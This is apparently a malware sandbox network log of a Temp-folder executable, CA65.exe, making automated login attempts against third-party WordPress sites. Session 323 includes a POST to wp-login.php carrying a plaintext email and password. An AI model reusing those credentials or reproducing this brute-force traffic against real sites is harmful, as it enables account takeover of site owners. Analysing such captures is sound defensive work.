2023-12-22 20:15:12 UTC	1369	IN	Data Raw: 6d 6e 6d 5f 66 6f 72 6d 20 2e 6d 6e 6d 5f 69 74 65 6d 20 2e 62 6f 78 2d 74 65 78 74 20 2e 71 75 61 6e 74 69 74 79 20 2e 62 75 74 74 6f 6e 20 7b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 20 7d 0a 09 09 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 64 6f 6d 69 6e 61 6e 74 2d 63 6f 6c 6f 72 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 5b 64 61 74 61 2d 64 6f 6d 69 6e 61 6e 74 2d 63 6f 6c 6f 72 5d 3a 6e 6f 74 28 2e 68 61 73 2d 74 72 61 6e 73 70 61 72 65 6e 63 79 29 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 64 6f 6d 69 6e 61 6e 74 2d 63 6f 6c 6f 72 29 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 Data Ascii: mnm_form .mnm_item .box-text .quantity .button { margin-top: 0; }</style><style id="dominant-color-styles-inline-css" type="text/css">img[data-dominant-color]:not(.has-transparency) { background-color: var(--dominant-color); }</style><link rel="st
2023-12-22 20:15:12 UTC	1369	IN	Data Raw: 65 72 63 65 2d 6d 69 78 2d 61 6e 64 2d 6d 61 74 63 68 2d 70 72 6f 64 75 63 74 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2f 62 6c 6f 63 6b 73 2f 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 73 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 64 61 74 61 2d 6d 69 6e 69 66 79 3d 22 31 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 63 2d 70 62 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 73 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f Data Ascii: erce-mix-and-match-products/assets/css/frontend/blocks/checkout-blocks.css?ver=1703001817" type="text/css" media="all" /><link data-minify="1" rel="stylesheet" id="wc-pb-checkout-blocks-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
323	192.168.2.4	57454	50.31.65.5	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:12 UTC	344	OUT	POST /wp-login.php HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP+Cookie+check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://saltdelcolom.com/wp-login.php Content-Length: 163 Content-Type: application/x-www-form-urlencoded
2023-12-22 20:15:12 UTC	163	OUT	Data Raw: 6c 6f 67 3d 70 65 70 25 34 30 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 26 70 77 64 3d 39 25 33 46 25 33 46 30 51 25 33 46 25 33 46 25 32 31 43 6b 25 33 46 25 32 35 4e 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 45 6e 74 72 61 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=pep%40saltdelcolom.com&pwd=9%3F%3F0Q%3F%3F%21Ck%3F%25N&rememberme=forever&wp-submit=Entra&redirect_to=https%3A%2F%2Fsaltdelcolom.com%2Fwp-admin%2F&testcookie=1
2023-12-22 20:15:13 UTC	353	IN	HTTP/1.1 200 OK Connection: close content-type: text/html content-length: 1686 date: Fri, 22 Dec 2023 20:15:13 GMT server: LiteSpeed cache-control: no-cache,no-store alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:13 UTC	1015	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 Data Ascii: <!DOCTYPE html><html><head> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252
2023-12-22 20:15:13 UTC	671	IN	Data Raw: 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 63 61 70 74 63 68 61 2d 63 65 6e 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 35 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 33 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 31 33 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 Data Ascii: n-top: 10px; text-align: center; } .recaptcha-center { margin-top: 35px; margin-bottom: 20px; margin-left: 13%; margin-right: 13%; display: block; } </style></head><body> <d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
324	192.168.2.4	57453	209.124.80.122	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:12 UTC	168	OUT	GET /admin.php HTTP/1.1 Host: cicfl.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	321	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:12 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:13 UTC	7871	IN	Data Raw: 33 64 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d Data Ascii: 3da4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><!-
2023-12-22 20:15:13 UTC	7915	IN	Data Raw: 33 37 30 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 73 2d 6f 75 74 6c 69 6e 65 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 66 61 35 33 37 30 3b 63 6f 6c 6f 72 3a 23 66 61 35 33 37 30 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 73 2d 66 69 6c 6c 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 61 35 33 37 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d Data Ascii: 370;}.ast-header-break-point .ast-mobile-menu-buttons-outline.menu-toggle{background:transparent;border:1px solid #fa5370;color:#fa5370;}.ast-header-break-point .ast-mobile-menu-buttons-fill.menu-toggle{background:#fa5370;color:#ffffff;}.ast-header-break-
2023-12-22 20:15:13 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:13 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 34 32 38 35 37 31 34 32 38 35 37 31 72 65 6d 3b 7d 2e 61 73 74 2d 63 6f 6d 6d 65 6e 74 2d 6d 65 74 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 37 38 35 37 31 34 32 38 35 37 31 34 32 39 72 65 6d 3b 7d 2e 77 69 64 67 65 74 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 32 38 35 37 31 34 32 38 35 37 31 34 72 65 6d 3b 7d 62 6f 64 79 2c 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 Data Ascii: 1f40omment-reply-title{font-size:23px;font-size:1.6428571428571rem;}.ast-comment-meta{font-size:11px;font-size:0.78571428571429rem;}.widget-title{font-size:20px;font-size:1.4285714285714rem;}body,button,input,select,textarea,.ast-button,.ast-custom-butt
2023-12-22 20:15:13 UTC	7822	IN	Data Raw: 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d Data Ascii: y{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--
2023-12-22 20:15:13 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:13 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 78 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 Data Ascii: 1f40nt-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}</style><link rel='styles
2023-12-22 20:15:13 UTC	7822	IN	Data Raw: 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 22 20 2f 3e 3c 66 65 43 6f 6d 70 6f 6e 65 6e 74 54 72 61 6e 73 66 65 72 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 20 3e 3c 66 65 46 75 6e 63 52 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 2e 35 34 39 30 31 39 36 30 37 38 34 33 31 34 20 30 2e 39 38 38 32 33 35 32 39 34 31 31 37 36 35 22 20 2f 3e 3c 66 65 46 75 6e 63 47 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 20 31 22 20 2f 3e 3c 66 65 46 75 6e 63 42 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 Data Ascii: .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues
2023-12-22 20:15:13 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:13 UTC	1382	IN	Data Raw: 35 35 66 0d 0a 2d 63 6f 6c 2d 78 73 2d 31 32 22 20 3e 0d 0a 09 09 09 09 09 09 09 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 32 33 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 73 69 74 65 2d 74 69 74 6c 65 22 3e 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 3c 2f 73 70 61 6e 3e 20 7c 20 50 6f 77 65 72 65 64 20 62 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 73 69 74 65 2d 74 69 74 6c 65 22 3e 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 3c 2f 73 70 61 6e 3e 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 0d 0a 09 09 09 09 09 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 20 3c 21 2d Data Ascii: 55f-col-xs-12" >Copyright 2023 <span class="ast-footer-site-title">CICFL \| Commercial Industrial Corp</span> \| Powered by <span class="ast-footer-site-title">CICFL \| Commercial Industrial Corp</span></div></div> <!-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
325	192.168.2.4	57495	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:12 UTC	240	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Fcannaclear.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:12 UTC	1345	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:15:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() cf-mitigated: challenge Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vpxZsnFrTAz%2BeJIbgSz9dY8QLOvcKtOaoFX64NYTWQJDRmeM3%2B3etsW%2B5bOBomJp7orXOiXmUIqPm7tL%2FbK3hcwncuxfT7ZQhVgP8alPxqODfcQYGknQnkoRJBxsdt8%2Bjw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b0918ed937498-MIA
2023-12-22 20:15:12 UTC	32	IN	Data Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:12 UTC	1369	IN	Data Raw: 31 39 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 19e4<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2023-12-22 20:15:12 UTC	1369	IN	Data Raw: 69 56 50 2e 4c 5f 36 6d 31 50 4c 59 57 5a 58 65 70 74 63 2d 31 37 30 33 32 37 36 31 31 32 2d 31 2d 41 64 69 72 2d 56 54 46 50 32 48 43 5f 4c 72 68 59 63 47 39 4c 6e 63 78 74 43 66 56 50 41 76 36 73 6a 44 74 39 6a 51 2d 38 68 33 50 4c 33 32 7a 6f 37 59 4e 70 51 64 69 38 54 62 68 5f 36 50 30 71 32 56 70 6b 68 46 50 41 58 59 45 5f 70 2d 79 78 6c 72 32 47 30 71 4c 6a 5f 46 37 6b 41 37 4b 32 72 43 33 43 35 6f 4f 4c 77 64 68 66 73 77 43 78 36 66 65 6b 36 48 66 72 6c 5f 7a 4e 59 56 57 39 52 4f 77 68 42 61 42 79 56 7a 42 43 63 45 74 64 6d 73 76 4e 47 70 78 52 50 46 6a 76 6f 35 55 52 46 76 48 72 71 62 77 4a 70 6a 4f 58 4a 75 4c 4c 5f 50 6b 58 58 73 46 31 45 2d 55 6e 69 63 45 50 70 71 50 34 4d 43 75 55 43 6e 49 4c 72 55 52 32 30 79 57 63 5f 71 5f 4a 38 63 6e 59 47 Data Ascii: iVP.L_6m1PLYWZXeptc-1703276112-1-Adir-VTFP2HC_LrhYcG9LncxtCfVPAv6sjDt9jQ-8h3PL32zo7YNpQdi8Tbh_6P0q2VpkhFPAXYE_p-yxlr2G0qLj_F7kA7K2rC3C5oOLwdhfswCx6fek6Hfrl_zNYVW9ROwhBaByVzBCcEtdmsvNGpxRPFjvo5URFvHrqbwJpjOXJuLL_PkXXsF1E-UnicEPpqP4MCuUCnILrUR20yWc_q_J8cnYG
2023-12-22 20:15:12 UTC	1369	IN	Data Raw: 6a 52 74 36 4e 7a 7a 43 6e 51 73 30 43 2d 65 45 64 39 5f 58 69 32 6b 46 74 51 5f 64 6e 39 49 41 64 6a 58 46 6e 6e 35 70 35 67 54 31 43 32 33 6e 46 71 30 6c 57 64 65 72 78 5f 45 6e 33 4a 65 78 36 44 54 2d 71 6e 6a 79 53 62 52 31 33 62 76 43 55 2d 63 6f 7a 39 4b 53 2d 59 59 4d 6a 50 4c 72 30 49 55 44 72 72 67 50 39 4c 37 45 48 75 53 2d 5a 38 4e 76 76 41 37 75 46 34 30 7a 51 45 30 54 57 6a 6b 55 30 50 71 65 5a 33 6f 5a 5f 45 68 50 66 30 6c 39 6c 61 4a 58 42 5a 4e 4a 6f 70 77 66 62 47 5f 56 44 45 45 69 6f 68 37 76 7a 68 75 34 36 57 49 7a 42 49 6d 66 51 45 41 74 64 42 79 61 73 50 4a 51 31 41 30 53 72 36 54 5f 66 48 4c 6f 34 33 6a 4e 42 34 57 51 58 79 65 43 33 42 37 31 62 6d 30 67 37 56 49 43 70 30 68 4d 76 45 46 34 4f 42 69 52 59 6b 6b 56 45 6a 6a 43 32 72 61 Data Ascii: jRt6NzzCnQs0C-eEd9_Xi2kFtQ_dn9IAdjXFnn5p5gT1C23nFq0lWderx_En3Jex6DT-qnjySbR13bvCU-coz9KS-YYMjPLr0IUDrrgP9L7EHuS-Z8NvvA7uF40zQE0TWjkU0PqeZ3oZ_EhPf0l9laJXBZNJopwfbG_VDEEioh7vzhu46WIzBImfQEAtdByasPJQ1A0Sr6T_fHLo43jNB4WQXyeC3B71bm0g7VICp0hMvEF4OBiRYkkVEjjC2ra
2023-12-22 20:15:12 UTC	1369	IN	Data Raw: 4f 52 6d 53 6a 4a 63 32 42 51 58 44 42 57 6f 49 64 52 34 72 6f 6d 4e 4b 6f 66 39 47 6b 77 34 32 39 64 69 35 61 38 61 46 77 48 74 7a 70 69 37 5a 73 50 6d 34 6c 77 30 50 68 4c 6b 53 30 4d 41 34 57 70 41 57 52 49 49 74 74 4d 4c 63 61 51 6c 32 57 5f 74 77 58 58 6e 61 32 62 4f 78 64 75 32 32 56 7a 6c 33 59 71 6e 42 4b 59 49 75 41 35 6c 33 44 42 6c 4a 48 59 59 51 49 79 6c 42 78 38 46 7a 6d 71 37 76 75 6b 68 31 4c 4a 50 30 6b 4d 36 68 69 61 2d 70 37 39 43 49 5f 67 44 4f 78 6e 7a 4e 62 38 54 6b 48 6a 4d 53 77 47 33 2d 6a 52 5f 31 65 6a 38 37 36 47 4f 6d 61 41 55 4e 7a 72 57 73 46 46 33 4f 59 5a 42 34 7a 34 54 36 68 42 71 63 4d 44 42 6c 52 5a 4f 4f 64 58 6e 68 46 6d 39 73 68 39 51 4d 70 32 41 47 69 43 64 65 55 6c 5a 2d 42 42 38 6e 68 32 55 6d 33 47 2d 78 43 41 70 Data Ascii: ORmSjJc2BQXDBWoIdR4romNKof9Gkw429di5a8aFwHtzpi7ZsPm4lw0PhLkS0MA4WpAWRIIttMLcaQl2W_twXXna2bOxdu22Vzl3YqnBKYIuA5l3DBlJHYYQIylBx8Fzmq7vukh1LJP0kM6hia-p79CI_gDOxnzNb8TkHjMSwG3-jR_1ej876GOmaAUNzrWsFF3OYZB4z4T6hBqcMDBlRZOOdXnhFm9sh9QMp2AGiCdeUlZ-BB8nh2Um3G-xCAp
2023-12-22 20:15:12 UTC	1160	IN	Data Raw: 37 75 37 44 67 73 4b 6b 44 6d 2b 53 38 52 37 79 71 2f 76 4e 67 3d 3d 27 2c 69 32 3a 20 27 58 2f 66 31 72 63 72 46 47 42 71 61 6a 57 56 6d 4b 62 68 6a 57 77 3d 3d 27 2c 7a 68 3a 20 27 75 71 69 72 30 2b 4e 47 35 41 77 37 53 73 38 6b 7a 68 55 7a 45 4b 48 78 45 31 6c 46 65 58 48 30 35 6a 7a 41 55 42 58 36 32 34 30 3d 27 2c 75 68 3a 20 27 66 6a 56 4a 58 72 54 59 2b 4c 78 30 7a 65 74 56 79 2f 42 72 64 6a 6f 51 68 6e 65 59 49 62 36 69 4b 39 46 6c 2f 76 58 6d 42 6f 73 3d 27 2c 68 68 3a 20 27 77 5a 4d 71 61 44 45 64 32 33 2b 47 58 70 48 73 63 42 4d 72 56 4e 36 4a 4c 53 65 45 43 4e 2b 47 6a 47 6d 6a 72 36 37 5a 47 34 67 3d 27 2c 7d 7d 3b 76 61 72 20 63 70 6f 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b Data Ascii: 7u7DgsKkDm+S8R7yq/vNg==',i2: 'X/f1rcrFGBqajWVmKbhjWw==',zh: 